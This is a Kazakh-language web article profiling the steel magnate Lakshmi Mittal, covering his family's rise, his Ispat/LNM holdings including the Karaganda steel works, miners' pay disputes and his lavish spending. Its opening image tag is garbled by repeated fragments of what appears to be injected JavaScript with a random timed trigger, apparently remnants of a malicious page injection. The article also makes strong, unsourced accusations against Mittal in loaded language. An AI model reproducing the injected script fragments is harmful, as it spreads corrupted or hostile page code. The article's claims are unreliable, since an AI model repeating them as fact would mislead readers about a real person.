2022-12-10

Біз білетін Лакшми Миттал

Spread the love

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/images.jpg» style=»margin: 5px; float: left;» alt=»images» src=»images/sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/images.jpg» height=»148″ width=»212″ />Марвар руын ежелден –ақ «үнділік еврейлер» атайтын. Марварлар Үндістанның шеткері құмдауыт өңірінде, Пәкістанмен шектесетін тұсында қоныстанған. Бұл «еврейлер» өте кедей тұрды әрі болашақтары бұлыңғыр еді. Әсіресе, көп мәселе Индия тәуелсіздігін жариялаған тұста туды. Бүгінде дүниежүзіне әйгілі Миттал отбасылық империясының тарихы үнділік Карач портындағы темір-терсек саудасымен байланысты. Иә, ішіңіз сезіп отырғандай біз, кәдімгі өзіміздің Қарағандыдағы («Ispat-Карметтің») иесі үнділік Митталдың шыққан тегі жайлы айтқалы отырмыз. Түйінді мәселесі көп шекаралы кедей аймақтан шыққан Лакшмидің әкесінің шаруасы Калькуттаға келгенде ғана оңала бастады. Ол өзінің таныстарымен қосылып шығынға белшесінен батқан, қираудың сәл-ақ алдында тұрған шойын зауытын сатып алады. Әрине, зауытты қалпына келтіру үшін көп уақыт, күш-жігер кетті, бірақ мақсатын айқындап алған отағасы ақыры дегеніне жетіп құрылыс үшін қажет шойыннан жасалған өнімдер шығара бастады. Коммерциялық құрылымға сол кездегі үкіметтің сенімі бола қойған жоқ, бірақ мемлекеттік осындай құрылымдарына қанша қаражат салсада нәтиже бермей тұрған тұсы еді бұл. Миттал өз ісіне бәсекенің жоғын, мемлекеттің түбі өздеріне бет бұратынын сезді, сөйтті де «Темір» («Ispat») атты мекемесін құрып, бар қаржысын Калькуттыдан онша алыс емес жерде балқыту зауытын салуға құйды. Империя осылай қанатын қатайтып, кеңге жая бастады. Бұл зауыттың құрылысын аяйқтай сала Миттал, екі бірдей зауыттың құрылысын бастады. Осы уақыттарда оған тасымалды бақылауға алып отыратын сенімді адам керек болды. Бұл адам Лакшми еді, ол оқуын жиып қойып жұмысқа кірісті.

Тасымал мәселесін шешу шешілмей жатқан көп түйіннің бірі еді. Үкіметтегі бірінші тұлғалардың күн аралап ауысуы үлкен Митталдың жұмысын тіптен қиындатып жіберді. Осыдан кейін ол салынып болған, салынып жатқан бірнеше зауытын сатты да, Индонезияға қоныс аударды, 15 миллионға жаңа зауыт сатып алды. Лакшми Миттал 25 жасында осы зауыттың директоры болды. Өзіндік түйсігі, ақылы бар Лакшми темірден өнім алудың әлдақайда пайдалы екенін түсінді, темірді қайта өңдеп бұйым шығарудың шығыны оны өндіруден әлдеқайда арзан еді. Кіші Митталдың Байлық әлеміне қадамы осылай басталды. Оның алғашқы келісімі Тринидада шығатын темірді жеткізу бойынша жасалды және сәтті шықты. Лакшмидің өімге ұсынған бағасы қалтаға келісімдері көңілге қонымды еді. Миттал бірнеше жылдан соң Тринидадағы тасымалдаушыларының бәрінің «кеңсесін» сатып алды. Мұна кейін Мексика, Канада, Германия, Қазақстандағы алдыңғы қатарлы кен орындарына иелік етті. 1997 жылы әлемдегі кен орындарына иелік жасай бастаған Лакшми кейбір активтерін сақтау үшін «ЛНМ групп» атты компаниясын тіркеді. «Кейбір актив» дегені өзіміздің қазақстандық «ИСПАТ-қа» тиесілі акциялардың бақылау пакеті екені осы жақында ғана мәлім болды. Белгілі бір уақытта мұны неге жасыру керек болды, бұл жағы белгісіз, белгілісі «ЛНМ» дегеніміз «Испат» империясы. «ЛНМ-нің» қожайыны Митталдың отбасы болып есептеледі, бірақ шешім қабылдау, қол қою құқығы Лакшмиға берілген. Миттал «шығармашылығының» негізгі идеясы табыссыз болмаса болмашы ғана табыспен қалт-құлт етіп отырған мекемелерді сатып алып, толықтай «апгрейд» жасау. Ол менеджерлер құрамын мекемені толықтай техникалық жарақтандыру, түпкілікті жаңа басшылық орнату үшін жібереді де, комбинатты өзіне ыңғайлы етіп жасақтап алады. Митталдың «Mittal Steel-і», «Испат» болса, Огайодан өткен жылы сатып алған «Steel group» атты үлкен корпорациясы бүгінде «Миттал Стил Индастриз» деп аталады. Соңғы мәліметтерге қарағанда Лакшми енді темірдің дүниежүзіндегі ең алпауыт дегендеріне «ауыз сала» бастағанға құсайды, олай дейтініміз Лакшмидің өзі болмаса өкілі осындай аукциондарда жиі бой көрсететін болды. Бірақ, «ЛНМ» бұл саудаларға қатыса ма, жоқ па мұны ешкім білмейді, қатысушылардың көбі Лакшми қашан сүрінеді деп күтетіні жасырын емес… Миттал мырза қанша бай, танымал болса, комбинаттарындағы әлеуметтік мәселелерде соншалықты шырғалаң. Наразылықтар, шерулер, шахтадағы жарылыстар… Әлемнің әр түкпірінен оның иелігіндегі кеніштерден осындай ақпараттар түсіп жатады. Себебі қарапайым: кеншілер еңбегіне қарай ақы төленсе дейді. Мәселен, Қарағандының көмірінің 1 тоннасы 13 доллар, Миттал осы бір тоннаны 100 доллардан астам қаржыға сатады, есептей беріңіз. Лакшми мырза осыдан жеті-сегіз жыл бұрын мәрттік танытып Қарағандыдағы «Миттал Стил Темиртаудың» металлургтері мен шахтерларын «мекеменің иесіне» айналдырмақ болған. Шығарылған 347 миллион акцияның 712 мыңы ұжымға тиесілі болды. Теория бойынша дивиденд «он үшінші жалақы» ретінде жыл қорытындысында төленуі керек болатын. Кеншілер оныда алды 100 теңгеден, екі бөлке нан… ал, польяктық кен орындарының кәсіподақ ұйымы Митталдан пляк жеріндегі кен орындарын қалай, қаншаға сатып алғанын ашық айтуды талап етіп отыр. Бір қызығы бұл кен орындар Лакшми сатып алған кен орындарының ең жария нұсқасы деп есептеледі. Ал, Қазақстанның «Испат-Карметі» оған қаншаға түсті, мұны ешкім білмейді. Митталдың бір ерекшелігі ол биліктің жоғарғы эшелонында танысы болмаса ол елден ешқандай мекеме сатып алмайды. Польшаның кен зауыттарының Лакшмидің иелігіне өтуіне бұрынғы экономика министрінің орынбасары Анджей Шараварскидің тікелей көмегі болған. Еуропалықтардың оған деген қарсылығы Ұлыбританиядағы 2001 жылғы сайлауға дейін туындаған болатын. Миттал лейбористер партиясына 125 мың фунт аударды, жәйден-жәй емес әрине, Тони Блэрдің Румыниядағы ірі зауытты сатып алуына көмектескені үшін. Жалақы төлемей қою Лакшмидің кен орындарындағы қалыпты жағдай. Польшадағы кен орындарында еден жуушыларды жұмыстан босатып, кеншілерге аптасына жеті рет жууынудың орнына бір рет қана рұқсат беруге дейін барған. Міне, сізге үнем! Байлығы бүкіл Қазақстанның бюджетіне тең болатын, «байшыкештің» еңбекке деген құрметі осындай. Жеке өмірі туралы айтар болсақ, Митталдың «Формула1-дің» иесі Барни Экслестоннан 128 миллион долларға Лондоннан үй сатып алғаны туралы мәліметтер бар.Бұл үйде 12 ұйықтайтын бөлме, үлкен қауыз, сән салоны, бал залы тағы-тағы түгендей берсек әліде біраз айтуға тура келеді талай кереметтері бар. Тағы бір мәлімет қызына қатысты. Ол қызын 2004 жылы ұзатады.Луврдағы Тюильри саябағын бір түнге жалға алып, Сен-Клуден сарай салып береді. Жас жұбайлардың неке қию рәсімі Версалде өткен. Той бес күнге созылып, әкесі 66 миллион доллар жұмсаған. Лакшми Миттал әлемдегі бай адамдардың ішіндегі «өзіндік» келбеті бар адам. Ол күнделікті адам өлігінің үстімен жүре береді. Мойындау керек ақылды, жетістіктерінің өзі білетін кілті бар, мықты менеджер, темірді пайдаға асырудың сан жолынУкаринада, Ресейде жалпы әлемде әзірге Митталдан басқа ешкім білмейді. Оның менеджерлік қабілеті Билл Гейтске келеді. Ал, оның келесі кен орны қай жерде болуы мүмкін дегенге келсек, Турция болмаса Румынияда деген сыбыс бар.{jcomments on}

Яндекс.Метрика